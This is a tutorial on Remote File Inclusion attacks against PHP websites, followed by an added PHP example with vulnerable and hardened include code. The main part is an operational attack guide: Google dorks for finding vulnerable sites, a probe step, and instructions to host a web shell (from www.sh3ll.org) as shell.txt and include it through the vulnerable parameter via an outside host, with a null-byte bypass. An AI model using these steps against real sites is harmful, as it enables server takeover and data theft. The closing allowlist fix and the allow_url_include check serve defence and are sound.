In my previous tutorial I talked about Remote File Inclusion (RFI), a type of attack that targets the servers that run web sites and their web applications. RFI exploits are most often attributed to the PHP programming language, which is used by many large organisations including Facebook and SugarCRM. However, RFI can manifest itself in other environments and was in fact introduced initially as SHTML injection. RFI works by exploiting web applications that dynamically include external scripts named by user input without proper sanitization. As a consequence, the application can be instructed to include a script hosted on a remote server and thus execute code controlled by an attacker. The included script can be used for one-off data theft or manipulation, or for a long-term takeover of the vulnerable server.
This can lead to something as minimal as outputting the contents of the file, but depending on the severity it can also lead to, to list a few:
§ Code execution on the web server
§ Code execution on the client side, such as injected JavaScript, which leads to other attacks such as cross-site scripting (XSS)
§ Denial of Service (DoS)
§ Data theft/manipulation
RFI is now an uncommon vulnerability, partly because websites are patched and updated regularly and partly because PHP has shipped with the allow_url_include setting disabled by default since PHP 5.2, which blocks include() of remote URLs outright.
So let's start with the tutorial, but before reading it, read the Disclaimer first.
The first step is to find a site that is vulnerable to remote file inclusion. For this you can use Google dorks. Some of the dorks look like this:
inurl:/template.php?pagina=
inurl:/index.php?pagina=
inurl:/index.php?inc=
inurl:/includes/include_onde.php?include_file=
inurl:/index.php?page=
inurl:/index.php?pg=
inurl:/index.php?show=
inurl:/index.php?cat=
inurl:/index.php?file=
inurl:/db.php?path_local=
inurl:/index.php?site=
inurl:/htmltonuke.php?filnavn=
Now you would test whether a site is actually vulnerable.
After getting the website list from the Google search, we have to test each website for the vulnerability. To understand it better, here is an example.
Suppose we have a vulnerable website, say
www.vulnerablesite.com
Now you replace the value of the vulnerable parameter with an external URL:
index.php?page=http://www.google.com
so that the request becomes
www.vulnerablesite.com/index.php?page=http://www.google.com
Hit Enter. If the page that comes back contains the Google homepage, the application fetched and included the remote URL, so the website is vulnerable to attack. One caveat: this probe only works when the parameter is included as-is. If the application appends a suffix such as .php to the parameter, the probe fails even though the site may still be exploitable with a null byte, as described in the exploitation step below.
Now you would exploit the vulnerability.
After this you have to get the shell onto the target website. For this, a few things must be taken into consideration: the shell must be hosted as a plain text file (shell.txt), like the Locus shell. If you host it as shell.php, your own web server executes it and serves the output instead of the PHP source; as .txt it is served verbatim, and the vulnerable include() on the target executes it there. You can see the shell page and download shells from www.sh3ll.org. Once we have the shell, we upload it to any free hosting service, and the shell page after uploading looks like this:
www.yourownwebsite.com/shell.txt
After this you have to point the vulnerable parameter at the shell page. This is done by adding it to the vulnerable site's URL:
www.vulnerablesite.com/v2/index.php?page=http://www.yourownwebsite.com/shell.txt
Sometimes you will have to use a null byte for it to execute successfully. If the application appends an extension (for example .php) to the parameter, the request for shell.txt fails; on PHP versions before 5.3.4 a URL-encoded null byte (%00) truncated the path at that point and dropped the appended extension. So if you receive an error with shell.txt, try shell.txt%00.
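As an added example that is not part of the original tutorial, here is the PHP pattern that makes the Google probe and the shell include above work, the suffix-append variant that needs the null byte, and a hardened version that maps the parameter to a fixed allowlist instead of a path. Only the page parameter comes from the dorks above; the file names, the PAGES array and the host attacker.example are assumptions for illustration.

```php
<?php
// Added example, not code from the original tutorial. Three versions of the
// "page" include the tutorial targets: two vulnerable, one hardened.
// File names, the PAGES array and attacker.example are hypothetical.

// 1. Vulnerable: the raw parameter reaches include(). With allow_url_include=On
//    (PHP 5.2+, default Off) ?page=http://attacker.example/shell.txt fetches the
//    remote text and executes it as PHP on this server. ?page=http://www.google.com
//    just dumps Google's HTML into the response, which is the probe from above.
function render_page_vulnerable(array $get): void
{
    $page = $get['page'] ?? 'home.php';
    include $page;
}

// 2. Still vulnerable: appending an extension does not help. The include
//    becomes http://attacker.example/shell.txt.php, which fails, but on
//    PHP < 5.3.4 a %00 in the parameter truncated the path at the NUL byte
//    and dropped the ".php" again. That is the null-byte trick from the text.
function render_page_suffix(array $get): void
{
    $page = $get['page'] ?? 'home';
    include $page . '.php';
}

// 3. Hardened: the parameter is a key into a fixed allowlist, never a path.
//    Anything not in the list (including any URL) falls back to the home page.
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function resolve_page(?string $requested): string
{
    $key = $requested ?? 'home';
    if (!array_key_exists($key, PAGES)) {
        return PAGES['home'];
    }
    return PAGES[$key];
}

function render_page_hardened(array $get): void
{
    // Files live under a fixed directory; user input never becomes a path.
    $file = __DIR__ . '/pages/' . resolve_page($get['page'] ?? null);
    include $file;
}

// The server-side setting that makes remote include possible at all.
// ini_get() returns "1" when allow_url_include is On; it should be Off.
function rfi_possible(): bool
{
    return filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN);
}

// Show what each version would try to include for the tutorial's probe
// without actually performing the include.
$probe = ['page' => 'http://www.google.com'];
echo "vulnerable include: " . $probe['page'] . PHP_EOL;
echo "suffix include:     " . $probe['page'] . '.php' . PHP_EOL;
echo "hardened include:   " . resolve_page($probe['page']) . PHP_EOL;
echo "allow_url_include:  " . (rfi_possible() ? 'On (remote include possible)' : 'Off') . PHP_EOL;
```

The allowlist is the fix that matters: once the parameter can only select among known files, neither the remote URL nor the null byte has anything to act on. Turning allow_url_include off (and checking it with rfi_possible() or by grepping php.ini) is the server-wide backstop for code you cannot change.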